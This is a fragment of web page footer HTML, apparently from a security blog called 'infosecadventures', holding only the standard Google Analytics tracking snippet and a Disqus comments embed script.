    <script type="text/javascript">
        (function(i,s,o,g,r,a,m) {i['GoogleAnalyticsObject']=r;i[r]=i[r]||function() {
        (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
        m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
        })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
        ga('create', 'UA-131012780-1', 'auto');
        ga('send', 'pageview');
    </script>

<!-- Baidu Analytics -->

<!-- Disqus Comments -->

    <script type="text/javascript">
        var disqus_shortname = 'infosecadventures';

        (function(){
            var dsq = document.createElement('script');
            dsq.type = 'text/javascript';
            dsq.async = true;
            dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
            (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
        }());
    </script>


